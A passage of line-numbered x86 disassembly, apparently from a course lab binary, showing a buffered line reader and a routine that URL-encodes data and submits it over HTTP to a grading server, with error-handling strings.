sub $0x3c,%esp 890 | 80492df: 89 55 d0 mov %edx,-0x30(%ebp) 891 | 80492e2: 83 f9 01 cmp $0x1,%ecx 892 | 80492e5: 0f 86 c1 00 00 00 jbe 80493ac 893 | 80492eb: 89 c3 mov %eax,%ebx 894 | 80492ed: 89 4d c4 mov %ecx,-0x3c(%ebp) 895 | 80492f0: c7 45 d4 01 00 00 00 movl $0x1,-0x2c(%ebp) 896 | 80492f7: 8d 78 0c lea 0xc(%eax),%edi 897 | 80492fa: eb 39 jmp 8049335 898 | 80492fc: c7 44 24 08 00 20 00 movl $0x2000,0x8(%esp) 899 | 8049303: 00 900 | 8049304: 89 7c 24 04 mov %edi,0x4(%esp) 901 | 8049308: 8b 03 mov (%ebx),%eax 902 | 804930a: 89 04 24 mov %eax,(%esp) 903 | 804930d: e8 5e f4 ff ff call 8048770 904 | 8049312: 89 43 04 mov %eax,0x4(%ebx) 905 | 8049315: 85 c0 test %eax,%eax 906 | 8049317: 79 0f jns 8049328 907 | 8049319: e8 c2 f5 ff ff call 80488e0 <__errno_location@plt> 908 | 804931e: 83 38 04 cmpl $0x4,(%eax) 909 | 8049321: 74 12 je 8049335 910 | 8049323: e9 96 00 00 00 jmp 80493be 911 | 8049328: 85 c0 test %eax,%eax 912 | 804932a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 913 | 8049330: 74 62 je 8049394 914 | 8049332: 89 7b 08 mov %edi,0x8(%ebx) 915 | 8049335: 8b 73 04 mov 0x4(%ebx),%esi 916 | 8049338: 85 f6 test %esi,%esi 917 | 804933a: 7e c0 jle 80492fc 918 | 804933c: 85 f6 test %esi,%esi 919 | 804933e: 0f 95 c0 setne %al 920 | 8049341: 0f b6 c0 movzbl %al,%eax 921 | 8049344: 89 45 cc mov %eax,-0x34(%ebp) 922 | 8049347: 8b 4b 08 mov 0x8(%ebx),%ecx 923 | 804934a: 89 44 24 08 mov %eax,0x8(%esp) 924 | 804934e: 89 4d c8 mov %ecx,-0x38(%ebp) 925 | 8049351: 89 4c 24 04 mov %ecx,0x4(%esp) 926 | 8049355: 8d 55 e7 lea -0x19(%ebp),%edx 927 | 8049358: 89 14 24 mov %edx,(%esp) 928 | 804935b: e8 40 f4 ff ff call 80487a0 929 | 8049360: 8b 4d c8 mov -0x38(%ebp),%ecx 930 | 8049363: 8b 55 cc mov -0x34(%ebp),%edx 931 | 8049366: 01 d1 add %edx,%ecx 932 | 8049368: 89 4b 08 mov %ecx,0x8(%ebx) 933 | 804936b: 29 d6 sub %edx,%esi 934 | 804936d: 89 73 04 mov %esi,0x4(%ebx) 935 | 8049370: 83 fa 01 cmp $0x1,%edx 936 | 8049373: 75 14 jne 8049389 937 | 8049375: 83 45 d0 01 addl $0x1,-0x30(%ebp) 938 | 8049379: 0f b6 45 e7 movzbl -0x19(%ebp),%eax 939 | 804937d: 8b 55 d0 mov -0x30(%ebp),%edx 940 | 8049380: 88 42 ff mov %al,-0x1(%edx) 941 | 8049383: 3c 0a cmp $0xa,%al 942 | 8049385: 75 17 jne 804939e 943 | 8049387: eb 2a jmp 80493b3 944 | 8049389: 83 7d cc 00 cmpl $0x0,-0x34(%ebp) 945 | 804938d: 75 36 jne 80493c5 946 | 804938f: 8b 45 d4 mov -0x2c(%ebp),%eax 947 | 8049392: eb 03 jmp 8049397 948 | 8049394: 8b 45 d4 mov -0x2c(%ebp),%eax 949 | 8049397: 83 f8 01 cmp $0x1,%eax 950 | 804939a: 75 17 jne 80493b3 951 | 804939c: eb 2e jmp 80493cc 952 | 804939e: 83 45 d4 01 addl $0x1,-0x2c(%ebp) 953 | 80493a2: 8b 45 c4 mov -0x3c(%ebp),%eax 954 | 80493a5: 39 45 d4 cmp %eax,-0x2c(%ebp) 955 | 80493a8: 74 09 je 80493b3 956 | 80493aa: eb 89 jmp 8049335 957 | 80493ac: c7 45 d4 01 00 00 00 movl $0x1,-0x2c(%ebp) 958 | 80493b3: 8b 45 d0 mov -0x30(%ebp),%eax 959 | 80493b6: c6 00 00 movb $0x0,(%eax) 960 | 80493b9: 8b 45 d4 mov -0x2c(%ebp),%eax 961 | 80493bc: eb 13 jmp 80493d1 962 | 80493be: b8 ff ff ff ff mov $0xffffffff,%eax 963 | 80493c3: eb 0c jmp 80493d1 964 | 80493c5: b8 ff ff ff ff mov $0xffffffff,%eax 965 | 80493ca: eb 05 jmp 80493d1 966 | 80493cc: b8 00 00 00 00 mov $0x0,%eax 967 | 80493d1: 83 c4 3c add $0x3c,%esp 968 | 80493d4: 5b pop %ebx 969 | 80493d5: 5e pop %esi 970 | 80493d6: 5f pop %edi 971 | 80493d7: 5d pop %ebp 972 | 80493d8: c3 ret 973 | 974 | 080493d9 : 975 | 80493d9: 55 push %ebp 976 | 80493da: 89 e5 mov %esp,%ebp 977 | 80493dc: 57 push %edi 978 | 80493dd: 56 push %esi 979 | 80493de: 53 push %ebx 980 | 80493df: 81 ec 6c a0 00 00 sub $0xa06c,%esp 981 | 80493e5: 8b 7d 08 mov 0x8(%ebp),%edi 982 | 80493e8: 8b 5d 1c mov 0x1c(%ebp),%ebx 983 | 80493eb: c7 85 c8 7f ff ff 00 movl $0x0,-0x8038(%ebp) 984 | 80493f2: 00 00 00 985 | 80493f5: c7 44 24 08 00 00 00 movl $0x0,0x8(%esp) 986 | 80493fc: 00 987 | 80493fd: c7 44 24 04 01 00 00 movl $0x1,0x4(%esp) 988 | 8049404: 00 989 | 8049405: c7 04 24 02 00 00 00 movl $0x2,(%esp) 990 | 804940c: e8 0f f5 ff ff call 8048920 991 | 8049411: 89 85 b4 5f ff ff mov %eax,-0xa04c(%ebp) 992 | 8049417: 85 c0 test %eax,%eax 993 | 8049419: 79 51 jns 804946c 994 | 804941b: 8b 45 20 mov 0x20(%ebp),%eax 995 | 804941e: c7 00 45 72 72 6f movl $0x6f727245,(%eax) 996 | 8049424: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax) 997 | 804942b: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax) 998 | 8049432: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax) 999 | 8049439: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax) 1000 | 8049440: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax) 1001 | 8049447: c7 40 18 63 72 65 61 movl $0x61657263,0x18(%eax) 1002 | 804944e: c7 40 1c 74 65 20 73 movl $0x73206574,0x1c(%eax) 1003 | 8049455: c7 40 20 6f 63 6b 65 movl $0x656b636f,0x20(%eax) 1004 | 804945c: 66 c7 40 24 74 00 movw $0x74,0x24(%eax) 1005 | 8049462: b8 ff ff ff ff mov $0xffffffff,%eax 1006 | 8049467: e9 b6 06 00 00 jmp 8049b22 1007 | 804946c: 89 3c 24 mov %edi,(%esp) 1008 | 804946f: e8 cc f4 ff ff call 8048940 1009 | 8049474: 85 c0 test %eax,%eax 1010 | 8049476: 75 2f jne 80494a7 1011 | 8049478: 89 7c 24 08 mov %edi,0x8(%esp) 1012 | 804947c: c7 44 24 04 d8 a3 04 movl $0x804a3d8,0x4(%esp) 1013 | 8049483: 08 1014 | 8049484: 8b 45 20 mov 0x20(%ebp),%eax 1015 | 8049487: 89 04 24 mov %eax,(%esp) 1016 | 804948a: e8 81 f4 ff ff call 8048910 1017 | 804948f: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1018 | 8049495: 89 04 24 mov %eax,(%esp) 1019 | 8049498: e8 c3 f4 ff ff call 8048960 1020 | 804949d: b8 ff ff ff ff mov $0xffffffff,%eax 1021 | 80494a2: e9 7b 06 00 00 jmp 8049b22 1022 | 80494a7: 8d 75 d8 lea -0x28(%ebp),%esi 1023 | 80494aa: c7 45 d8 00 00 00 00 movl $0x0,-0x28(%ebp) 1024 | 80494b1: c7 45 dc 00 00 00 00 movl $0x0,-0x24(%ebp) 1025 | 80494b8: c7 45 e0 00 00 00 00 movl $0x0,-0x20(%ebp) 1026 | 80494bf: c7 45 e4 00 00 00 00 movl $0x0,-0x1c(%ebp) 1027 | 80494c6: 66 c7 45 d8 02 00 movw $0x2,-0x28(%ebp) 1028 | 80494cc: 8b 50 0c mov 0xc(%eax),%edx 1029 | 80494cf: 89 54 24 08 mov %edx,0x8(%esp) 1030 | 80494d3: 8d 55 dc lea -0x24(%ebp),%edx 1031 | 80494d6: 89 54 24 04 mov %edx,0x4(%esp) 1032 | 80494da: 8b 40 10 mov 0x10(%eax),%eax 1033 | 80494dd: 8b 00 mov (%eax),%eax 1034 | 80494df: 89 04 24 mov %eax,(%esp) 1035 | 80494e2: e8 09 f3 ff ff call 80487f0 1036 | 80494e7: 0f b7 45 0c movzwl 0xc(%ebp),%eax 1037 | 80494eb: 66 c1 c8 08 ror $0x8,%ax 1038 | 80494ef: 66 89 45 da mov %ax,-0x26(%ebp) 1039 | 80494f3: c7 44 24 08 10 00 00 movl $0x10,0x8(%esp) 1040 | 80494fa: 00 1041 | 80494fb: 89 74 24 04 mov %esi,0x4(%esp) 1042 | 80494ff: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1043 | 8049505: 89 04 24 mov %eax,(%esp) 1044 | 8049508: e8 43 f4 ff ff call 8048950 1045 | 804950d: 85 c0 test %eax,%eax 1046 | 804950f: 79 2f jns 8049540 1047 | 8049511: 89 7c 24 08 mov %edi,0x8(%esp) 1048 | 8049515: c7 44 24 04 04 a4 04 movl $0x804a404,0x4(%esp) 1049 | 804951c: 08 1050 | 804951d: 8b 45 20 mov 0x20(%ebp),%eax 1051 | 8049520: 89 04 24 mov %eax,(%esp) 1052 | 8049523: e8 e8 f3 ff ff call 8048910 1053 | 8049528: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1054 | 804952e: 89 04 24 mov %eax,(%esp) 1055 | 8049531: e8 2a f4 ff ff call 8048960 1056 | 8049536: b8 ff ff ff ff mov $0xffffffff,%eax 1057 | 804953b: e9 e2 05 00 00 jmp 8049b22 1058 | 8049540: ba ff ff ff ff mov $0xffffffff,%edx 1059 | 8049545: 89 df mov %ebx,%edi 1060 | 8049547: b8 00 00 00 00 mov $0x0,%eax 1061 | 804954c: 89 d1 mov %edx,%ecx 1062 | 804954e: f2 ae repnz scas %es:(%edi),%al 1063 | 8049550: f7 d1 not %ecx 1064 | 8049552: 89 8d b0 5f ff ff mov %ecx,-0xa050(%ebp) 1065 | 8049558: 8b 7d 10 mov 0x10(%ebp),%edi 1066 | 804955b: 89 d1 mov %edx,%ecx 1067 | 804955d: f2 ae repnz scas %es:(%edi),%al 1068 | 804955f: 89 8d ac 5f ff ff mov %ecx,-0xa054(%ebp) 1069 | 8049565: 8b 7d 14 mov 0x14(%ebp),%edi 1070 | 8049568: 89 d1 mov %edx,%ecx 1071 | 804956a: f2 ae repnz scas %es:(%edi),%al 1072 | 804956c: 89 ce mov %ecx,%esi 1073 | 804956e: f7 d6 not %esi 1074 | 8049570: 8b 7d 18 mov 0x18(%ebp),%edi 1075 | 8049573: 89 d1 mov %edx,%ecx 1076 | 8049575: f2 ae repnz scas %es:(%edi),%al 1077 | 8049577: 2b b5 ac 5f ff ff sub -0xa054(%ebp),%esi 1078 | 804957d: 29 ce sub %ecx,%esi 1079 | 804957f: 8b 8d b0 5f ff ff mov -0xa050(%ebp),%ecx 1080 | 8049585: 8d 44 49 fd lea -0x3(%ecx,%ecx,2),%eax 1081 | 8049589: 8d 44 06 7b lea 0x7b(%esi,%eax,1),%eax 1082 | 804958d: 3d 00 20 00 00 cmp $0x2000,%eax 1083 | 8049592: 76 7c jbe 8049610 1084 | 8049594: 8b 45 20 mov 0x20(%ebp),%eax 1085 | 8049597: c7 00 45 72 72 6f movl $0x6f727245,(%eax) 1086 | 804959d: c7 40 04 72 3a 20 52 movl $0x52203a72,0x4(%eax) 1087 | 80495a4: c7 40 08 65 73 75 6c movl $0x6c757365,0x8(%eax) 1088 | 80495ab: c7 40 0c 74 20 73 74 movl $0x74732074,0xc(%eax) 1089 | 80495b2: c7 40 10 72 69 6e 67 movl $0x676e6972,0x10(%eax) 1090 | 80495b9: c7 40 14 20 74 6f 6f movl $0x6f6f7420,0x14(%eax) 1091 | 80495c0: c7 40 18 20 6c 61 72 movl $0x72616c20,0x18(%eax) 1092 | 80495c7: c7 40 1c 67 65 2e 20 movl $0x202e6567,0x1c(%eax) 1093 | 80495ce: c7 40 20 49 6e 63 72 movl $0x72636e49,0x20(%eax) 1094 | 80495d5: c7 40 24 65 61 73 65 movl $0x65736165,0x24(%eax) 1095 | 80495dc: c7 40 28 20 53 55 42 movl $0x42555320,0x28(%eax) 1096 | 80495e3: c7 40 2c 4d 49 54 52 movl $0x5254494d,0x2c(%eax) 1097 | 80495ea: c7 40 30 5f 4d 41 58 movl $0x58414d5f,0x30(%eax) 1098 | 80495f1: c7 40 34 42 55 46 00 movl $0x465542,0x34(%eax) 1099 | 80495f8: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1100 | 80495fe: 89 04 24 mov %eax,(%esp) 1101 | 8049601: e8 5a f3 ff ff call 8048960 1102 | 8049606: b8 ff ff ff ff mov $0xffffffff,%eax 1103 | 804960b: e9 12 05 00 00 jmp 8049b22 1104 | 8049610: 8d 95 cc 9f ff ff lea -0x6034(%ebp),%edx 1105 | 8049616: b9 00 08 00 00 mov $0x800,%ecx 1106 | 804961b: b8 00 00 00 00 mov $0x0,%eax 1107 | 8049620: 89 d7 mov %edx,%edi 1108 | 8049622: f3 ab rep stos %eax,%es:(%edi) 1109 | 8049624: 89 df mov %ebx,%edi 1110 | 8049626: b9 ff ff ff ff mov $0xffffffff,%ecx 1111 | 804962b: f2 ae repnz scas %es:(%edi),%al 1112 | 804962d: f7 d1 not %ecx 1113 | 804962f: 83 e9 01 sub $0x1,%ecx 1114 | 8049632: 89 ce mov %ecx,%esi 1115 | 8049634: 0f 84 05 04 00 00 je 8049a3f 1116 | 804963a: 89 d7 mov %edx,%edi 1117 | 804963c: 0f b6 03 movzbl (%ebx),%eax 1118 | 804963f: 3c 2a cmp $0x2a,%al 1119 | 8049641: 74 21 je 8049664 1120 | 8049643: 8d 50 d3 lea -0x2d(%eax),%edx 1121 | 8049646: 80 fa 01 cmp $0x1,%dl 1122 | 8049649: 76 19 jbe 8049664 1123 | 804964b: 3c 5f cmp $0x5f,%al 1124 | 804964d: 74 15 je 8049664 1125 | 804964f: 8d 50 d0 lea -0x30(%eax),%edx 1126 | 8049652: 80 fa 09 cmp $0x9,%dl 1127 | 8049655: 76 0d jbe 8049664 1128 | 8049657: 89 c2 mov %eax,%edx 1129 | 8049659: 83 e2 df and $0xffffffdf,%edx 1130 | 804965c: 83 ea 41 sub $0x41,%edx 1131 | 804965f: 80 fa 19 cmp $0x19,%dl 1132 | 8049662: 77 07 ja 804966b 1133 | 8049664: 8d 57 01 lea 0x1(%edi),%edx 1134 | 8049667: 88 07 mov %al,(%edi) 1135 | 8049669: eb 59 jmp 80496c4 1136 | 804966b: 3c 20 cmp $0x20,%al 1137 | 804966d: 75 08 jne 8049677 1138 | 804966f: 8d 57 01 lea 0x1(%edi),%edx 1139 | 8049672: c6 07 2b movb $0x2b,(%edi) 1140 | 8049675: eb 4d jmp 80496c4 1141 | 8049677: 8d 50 e0 lea -0x20(%eax),%edx 1142 | 804967a: 80 fa 5f cmp $0x5f,%dl 1143 | 804967d: 76 08 jbe 8049687 1144 | 804967f: 3c 09 cmp $0x9,%al 1145 | 8049681: 0f 85 1d 04 00 00 jne 8049aa4 1146 | 8049687: 0f b6 c0 movzbl %al,%eax 1147 | 804968a: 89 44 24 08 mov %eax,0x8(%esp) 1148 | 804968e: c7 44 24 04 18 a5 04 movl $0x804a518,0x4(%esp) 1149 | 8049695: 08 1150 | 8049696: 8d 85 c0 5f ff ff lea -0xa040(%ebp),%eax 1151 | 804969c: 89 04 24 mov %eax,(%esp) 1152 | 804969f: e8 6c f2 ff ff call 8048910 1153 | 80496a4: 0f b6 85 c0 5f ff ff movzbl -0xa040(%ebp),%eax 1154 | 80496ab: 88 07 mov %al,(%edi) 1155 | 80496ad: 0f b6 85 c1 5f ff ff movzbl -0xa03f(%ebp),%eax 1156 | 80496b4: 88 47 01 mov %al,0x1(%edi) 1157 | 80496b7: 8d 57 03 lea 0x3(%edi),%edx 1158 | 80496ba: 0f b6 85 c2 5f ff ff movzbl -0xa03e(%ebp),%eax 1159 | 80496c1: 88 47 02 mov %al,0x2(%edi) 1160 | 80496c4: 83 c3 01 add $0x1,%ebx 1161 | 80496c7: 83 ee 01 sub $0x1,%esi 1162 | 80496ca: 0f 84 6f 03 00 00 je 8049a3f 1163 | 80496d0: 89 d7 mov %edx,%edi 1164 | 80496d2: e9 65 ff ff ff jmp 804963c 1165 | 80496d7: 89 5c 24 08 mov %ebx,0x8(%esp) 1166 | 80496db: 89 74 24 04 mov %esi,0x4(%esp) 1167 | 80496df: 89 3c 24 mov %edi,(%esp) 1168 | 80496e2: e8 a9 f1 ff ff call 8048890 1169 | 80496e7: 85 c0 test %eax,%eax 1170 | 80496e9: 7f 0f jg 80496fa 1171 | 80496eb: e8 f0 f1 ff ff call 80488e0 <__errno_location@plt> 1172 | 80496f0: 83 38 04 cmpl $0x4,(%eax) 1173 | 80496f3: 75 15 jne 804970a 1174 | 80496f5: b8 00 00 00 00 mov $0x0,%eax 1175 | 80496fa: 01 c6 add %eax,%esi 1176 | 80496fc: 29 c3 sub %eax,%ebx 1177 | 80496fe: 75 d7 jne 80496d7 1178 | 8049700: 8b bd b0 5f ff ff mov -0xa050(%ebp),%edi 1179 | 8049706: 85 ff test %edi,%edi 1180 | 8049708: 79 67 jns 8049771 1181 | 804970a: 8b 45 20 mov 0x20(%ebp),%eax 1182 | 804970d: c7 00 45 72 72 6f movl $0x6f727245,(%eax) 1183 | 8049713: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax) 1184 | 804971a: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax) 1185 | 8049721: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax) 1186 | 8049728: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax) 1187 | 804972f: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax) 1188 | 8049736: c7 40 18 77 72 69 74 movl $0x74697277,0x18(%eax) 1189 | 804973d: c7 40 1c 65 20 74 6f movl $0x6f742065,0x1c(%eax) 1190 | 8049744: c7 40 20 20 74 68 65 movl $0x65687420,0x20(%eax) 1191 | 804974b: c7 40 24 20 73 65 72 movl $0x72657320,0x24(%eax) 1192 | 8049752: c7 40 28 76 65 72 00 movl $0x726576,0x28(%eax) 1193 | 8049759: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1194 | 804975f: 89 04 24 mov %eax,(%esp) 1195 | 8049762: e8 f9 f1 ff ff call 8048960 1196 | 8049767: b8 ff ff ff ff mov $0xffffffff,%eax 1197 | 804976c: e9 b1 03 00 00 jmp 8049b22 1198 | 8049771: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1199 | 8049777: 89 85 cc df ff ff mov %eax,-0x2034(%ebp) 1200 | 804977d: c7 85 d0 df ff ff 00 movl $0x0,-0x2030(%ebp) 1201 | 8049784: 00 00 00 1202 | 8049787: 8d 85 d8 df ff ff lea -0x2028(%ebp),%eax 1203 | 804978d: 89 85 d4 df ff ff mov %eax,-0x202c(%ebp) 1204 | 8049793: b9 00 20 00 00 mov $0x2000,%ecx 1205 | 8049798: 8d 95 cc bf ff ff lea -0x4034(%ebp),%edx 1206 | 804979e: 8d 85 cc df ff ff lea -0x2034(%ebp),%eax 1207 | 80497a4: e8 2d fb ff ff call 80492d6 1208 | 80497a9: 85 c0 test %eax,%eax 1209 | 80497ab: 7f 7b jg 8049828 1210 | 80497ad: 8b 45 20 mov 0x20(%ebp),%eax 1211 | 80497b0: c7 00 45 72 72 6f movl $0x6f727245,(%eax) 1212 | 80497b6: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax) 1213 | 80497bd: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax) 1214 | 80497c4: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax) 1215 | 80497cb: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax) 1216 | 80497d2: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax) 1217 | 80497d9: c7 40 18 72 65 61 64 movl $0x64616572,0x18(%eax) 1218 | 80497e0: c7 40 1c 20 66 69 72 movl $0x72696620,0x1c(%eax) 1219 | 80497e7: c7 40 20 73 74 20 68 movl $0x68207473,0x20(%eax) 1220 | 80497ee: c7 40 24 65 61 64 65 movl $0x65646165,0x24(%eax) 1221 | 80497f5: c7 40 28 72 20 66 72 movl $0x72662072,0x28(%eax) 1222 | 80497fc: c7 40 2c 6f 6d 20 73 movl $0x73206d6f,0x2c(%eax) 1223 | 8049803: c7 40 30 65 72 76 65 movl $0x65767265,0x30(%eax) 1224 | 804980a: 66 c7 40 34 72 00 movw $0x72,0x34(%eax) 1225 | 8049810: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1226 | 8049816: 89 04 24 mov %eax,(%esp) 1227 | 8049819: e8 42 f1 ff ff call 8048960 1228 | 804981e: b8 ff ff ff ff mov $0xffffffff,%eax 1229 | 8049823: e9 fa 02 00 00 jmp 8049b22 1230 | 8049828: 8d 85 c8 5f ff ff lea -0xa038(%ebp),%eax 1231 | 804982e: 89 44 24 10 mov %eax,0x10(%esp) 1232 | 8049832: 8d 85 c8 7f ff ff lea -0x8038(%ebp),%eax 1233 | 8049838: 89 44 24 0c mov %eax,0xc(%esp) 1234 | 804983c: 8d 85 cc 7f ff ff lea -0x8034(%ebp),%eax 1235 | 8049842: 89 44 24 08 mov %eax,0x8(%esp) 1236 | 8049846: c7 44 24 04 1f a5 04 movl $0x804a51f,0x4(%esp) 1237 | 804984d: 08 1238 | 804984e: 8d 85 cc bf ff ff lea -0x4034(%ebp),%eax 1239 | 8049854: 89 04 24 mov %eax,(%esp) 1240 | 8049857: e8 54 f0 ff ff call 80488b0 <__isoc99_sscanf@plt> 1241 | 804985c: 8b 85 c8 7f ff ff mov -0x8038(%ebp),%eax 1242 | 8049862: 3d c8 00 00 00 cmp $0xc8,%eax 1243 | 8049867: 0f 84 c5 00 00 00 je 8049932 1244 | 804986d: 8d 95 c8 5f ff ff lea -0xa038(%ebp),%edx 1245 | 8049873: 89 54 24 0c mov %edx,0xc(%esp) 1246 | 8049877: 89 44 24 08 mov %eax,0x8(%esp) 1247 | 804987b: c7 44 24 04 2c a4 04 movl $0x804a42c,0x4(%esp) 1248 | 8049882: 08 1249 | 8049883: 8b 45 20 mov 0x20(%ebp),%eax 1250 | 8049886: 89 04 24 mov %eax,(%esp) 1251 | 8049889: e8 82 f0 ff ff call 8048910 1252 | 804988e: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1253 | 8049894: 89 04 24 mov %eax,(%esp) 1254 | 8049897: e8 c4 f0 ff ff call 8048960 1255 | 804989c: b8 ff ff ff ff mov $0xffffffff,%eax 1256 | 80498a1: e9 7c 02 00 00 jmp 8049b22 1257 | 80498a6: b9 00 20 00 00 mov $0x2000,%ecx 1258 | 80498ab: 8d 95 cc bf ff ff lea -0x4034(%ebp),%edx 1259 | 80498b1: 8d 85 cc df ff ff lea -0x2034(%ebp),%eax 1260 | 80498b7: e8 1a fa ff ff call 80492d6 1261 | 80498bc: 85 c0 test %eax,%eax 1262 | 80498be: 7f 72 jg 8049932 1263 | 80498c0: 8b 45 20 mov 0x20(%ebp),%eax 1264 | 80498c3: c7 00 45 72 72 6f movl $0x6f727245,(%eax) 1265 | 80498c9: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax) 1266 | 80498d0: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax) 1267 | 80498d7: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax) 1268 | 80498de: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax) 1269 | 80498e5: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax) 1270 | 80498ec: c7 40 18 72 65 61 64 movl $0x64616572,0x18(%eax) 1271 | 80498f3: c7 40 1c 20 68 65 61 movl $0x61656820,0x1c(%eax) 1272 | 80498fa: c7 40 20 64 65 72 73 movl $0x73726564,0x20(%eax) 1273 | 8049901: c7 40 24 20 66 72 6f movl $0x6f726620,0x24(%eax) 1274 | 8049908: c7 40 28 6d 20 73 65 movl $0x6573206d,0x28(%eax) 1275 | 804990f: c7 40 2c 72 76 65 72 movl $0x72657672,0x2c(%eax) 1276 | 8049916: c6 40 30 00 movb $0x0,0x30(%eax) 1277 | 804991a: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1278 | 8049920: 89 04 24 mov %eax,(%esp) 1279 | 8049923: e8 38 f0 ff ff call 8048960 1280 | 8049928: b8 ff ff ff ff mov $0xffffffff,%eax 1281 | 804992d: e9 f0 01 00 00 jmp 8049b22 1282 | 8049932: 80 bd cc bf ff ff 0d cmpb $0xd,-0x4034(%ebp) 1283 | 8049939: 0f 85 67 ff ff ff jne 80498a6 1284 | 804993f: 80 bd cd bf ff ff 0a cmpb $0xa,-0x4033(%ebp) 1285 | 8049946: 0f 85 5a ff ff ff jne 80498a6 1286 | 804994c: 80 bd ce bf ff ff 00 cmpb $0x0,-0x4032(%ebp) 1287 | 8049953: 0f 85 4d ff ff ff jne 80498a6 1288 | 8049959: b9 00 20 00 00 mov $0x2000,%ecx 1289 | 804995e: 8d 95 cc bf ff ff lea -0x4034(%ebp),%edx 1290 | 8049964: 8d 85 cc df ff ff lea -0x2034(%ebp),%eax 1291 | 804996a: e8 67 f9 ff ff call 80492d6 1292 | 804996f: 85 c0 test %eax,%eax 1293 | 8049971: 7f 7c jg 80499ef 1294 | 8049973: 8b 45 20 mov 0x20(%ebp),%eax 1295 | 8049976: c7 00 45 72 72 6f movl $0x6f727245,(%eax) 1296 | 804997c: c7 40 04 72 3a 20 43 movl $0x43203a72,0x4(%eax) 1297 | 8049983: c7 40 08 6c 69 65 6e movl $0x6e65696c,0x8(%eax) 1298 | 804998a: c7 40 0c 74 20 75 6e movl $0x6e752074,0xc(%eax) 1299 | 8049991: c7 40 10 61 62 6c 65 movl $0x656c6261,0x10(%eax) 1300 | 8049998: c7 40 14 20 74 6f 20 movl $0x206f7420,0x14(%eax) 1301 | 804999f: c7 40 18 72 65 61 64 movl $0x64616572,0x18(%eax) 1302 | 80499a6: c7 40 1c 20 73 74 61 movl $0x61747320,0x1c(%eax) 1303 | 80499ad: c7 40 20 74 75 73 20 movl $0x20737574,0x20(%eax) 1304 | 80499b4: c7 40 24 6d 65 73 73 movl $0x7373656d,0x24(%eax) 1305 | 80499bb: c7 40 28 61 67 65 20 movl $0x20656761,0x28(%eax) 1306 | 80499c2: c7 40 2c 66 72 6f 6d movl $0x6d6f7266,0x2c(%eax) 1307 | 80499c9: c7 40 30 20 73 65 72 movl $0x72657320,0x30(%eax) 1308 | 80499d0: c7 40 34 76 65 72 00 movl $0x726576,0x34(%eax) 1309 | 80499d7: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1310 | 80499dd: 89 04 24 mov %eax,(%esp) 1311 | 80499e0: e8 7b ef ff ff call 8048960 1312 | 80499e5: b8 ff ff ff ff mov $0xffffffff,%eax 1313 | 80499ea: e9 33 01 00 00 jmp 8049b22 1314 | 80499ef: 8d 85 cc bf ff ff lea -0x4034(%ebp),%eax 1315 | 80499f5: 89 44 24 04 mov %eax,0x4(%esp) 1316 | 80499f9: 8b 45 20 mov 0x20(%ebp),%eax 1317 | 80499fc: 89 04 24 mov %eax,(%esp) 1318 | 80499ff: e8 fc ed ff ff call 8048800 1319 | 8049a04: 8b 85 b4 5f ff ff mov -0xa04c(%ebp),%eax 1320 | 8049a0a: 89 04 24 mov %eax,(%esp) 1321 | 8049a0d: e8 4e ef ff ff call 8048960 1322 | 8049a12: 8b 45 20 mov 0x20(%ebp),%eax 1323 | 8049a15: 0f b6 00 movzbl (%eax),%eax 1324 | 8049a18: 83 e8 4f sub $0x4f,%eax 1325 | 8049a1b: 75 13 jne 8049a30 1326 | 8049a1d: 8b 45 20 mov 0x20(%ebp),%eax 1327 | 8049a20: 0f b6 40 01 movzbl 0x1(%eax),%eax 1328 | 8049a24: 83 e8 4b sub $0x4b,%eax 1329 | 8049a27: 75 07 jne 8049a30 1330 | 8049a29: 8b 45 20 mov 0x20(%ebp),%eax 1331 | 8049a2c: 0f b6 40 02 movzbl 0x2(%eax),%eax 1332 | 8049a30: 85 c0 test %eax,%eax 1333 | 8049a32: 0f 95 c0 setne %al 1334 | 8049a35: 0f b6 c0 movzbl %al,%eax 1335 | 8049a38: f7 d8 neg %eax 1336 | 8049a3a: e9 e3 00 00 00 jmp 8049b22 1337 | 8049a3f: 8d 85 cc 9f ff ff lea -0x6034(%ebp),%eax 1338 | 8049a45: 89 44 24 14 mov %eax,0x14(%esp) 1339 | 8049a49: 8b 45 18 mov 0x18(%ebp),%eax 1340 | 8049a4c: 89 44 24 10 mov %eax,0x10(%esp) 1341 | 8049a50: 8b 45 14 mov 0x14(%ebp),%eax 1342 | 8049a53: 89 44 24 0c mov %eax,0xc(%esp) 1343 | 8049a57: 8b 45 10 mov 0x10(%ebp),%eax 1344 | 8049a5a: 89 44 24 08 mov %eax,0x8(%esp) 1345 | 8049a5e: c7 44 24 04 5c a4 04 movl $0x804a45c,0x4(%esp) 1346 | 8049a65: 08 1347 | 8049a66: 8d bd cc bf ff ff lea -0x4034(%ebp),%edi 1348 | 8049a6c: 89 3c 24 mov %edi,(%esp) 1349 | 